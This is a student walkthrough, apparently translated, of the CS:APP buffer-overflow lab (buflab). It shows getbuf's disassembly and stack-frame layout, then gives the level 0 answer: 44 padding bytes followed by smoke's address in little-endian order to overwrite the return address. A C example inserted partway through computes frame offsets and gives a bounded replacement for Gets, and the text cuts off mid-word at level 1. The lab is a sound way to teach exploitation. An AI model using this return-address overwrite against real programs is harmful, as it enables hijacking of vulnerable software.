Lab 3: buflab. A lab that trains you to use a buffer vulnerability to do some illicit things (sly grin).
Overall it is somewhat easier than the previous lab, bomb lab; once you understand how the buffer works, it is fairly easy to finish.
*************************************************************************************************************************************************************************************
First, look at the getbuf function used by levels 0-3; the program uses it to set up the buffer.
08048ca4 <getbuf>:
8048ca4: 55 push %ebp
8048ca5: 89 e5 mov %esp,%ebp
8048ca7: 83 ec 38 sub $0x38,%esp
8048caa: 8d 45 d8 lea -0x28(%ebp),%eax <- the buffer is 0x28 bytes in total
8048cad: 89 04 24 mov %eax,(%esp)
8048cb0: e8 3c ff ff ff call 8048bf1 <Gets>
8048cb5: b8 01 00 00 00 mov $0x1,%eax
8048cba: c9 leave
8048cbb: c3 ret
0x28 (buffer) + 0x4 (saved %ebp, pushed by getbuf's prologue) + 0x4 (return address into <main>/test) make up getbuf's stack frame; the layout is shown in the figure below:
The whole frame, from the start of the buffer to the end of the return address, is 48 bytes.
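An added example, not code from the lab or from this write-up: the frame arithmetic above written out, plus the bounded read that makes the overflow impossible. It assumes the 32-bit layout shown (40-byte buffer, 4-byte saved %ebp, 4-byte return address); the function names are hypothetical.

```c
#include <stddef.h>
#include <string.h>

#define BUF_SIZE   0x28                 /* 40 bytes: the lab's getbuf buffer */
#define SAVED_EBP  4                    /* pushed by "push %ebp" in the prologue */
#define RET_ADDR   4                    /* return address left by "call getbuf" */
#define FRAME_SIZE (BUF_SIZE + SAVED_EBP + RET_ADDR)   /* 48 bytes */

/* Which frame slot does input byte number `offset` land in when Gets()
 * writes past the end of buf?  Byte 44 is the first byte of the return
 * address, which is why the level-0 answer pads 44 bytes first. */
enum slot { SLOT_BUF, SLOT_SAVED_EBP, SLOT_RETADDR, SLOT_BEYOND };

enum slot overflow_slot(size_t offset) {
    if (offset < BUF_SIZE)             return SLOT_BUF;
    if (offset < BUF_SIZE + SAVED_EBP) return SLOT_SAVED_EBP;
    if (offset < FRAME_SIZE)           return SLOT_RETADDR;
    return SLOT_BEYOND;
}

/* Hardened replacement for the lab's Gets(): copies at most buf_size-1
 * bytes of `line` into buf, always NUL-terminates, and returns how many
 * input bytes were discarded (nonzero means an overlong line was seen). */
size_t gets_bounded(char *buf, size_t buf_size, const char *line) {
    size_t len = strlen(line);
    if (buf_size == 0) return len;      /* nothing can be stored at all */
    size_t keep = len < buf_size - 1 ? len : buf_size - 1;
    memcpy(buf, line, keep);
    buf[keep] = '\0';
    return len - keep;
}
```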
*************************************************************************************************************************************************************************
level 0:
Your task is to get BUFBOMB to execute the code for smoke when getbuf executes its return statement, rather than returning to test
Find the address of the <smoke> function:
08049174 <smoke>:
8049174: 55 push %ebp
8049175: 89 e5 mov %esp,%ebp
So replace the return address with 08 04 91 74 (note: little endian) and the level is done.
answer:
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
74 91 04 08
The first 44 bytes are arbitrary padding.
*************************************************************************************************************************************************************************
level 1:
your task is to get BUFBOMB to execute the code for fi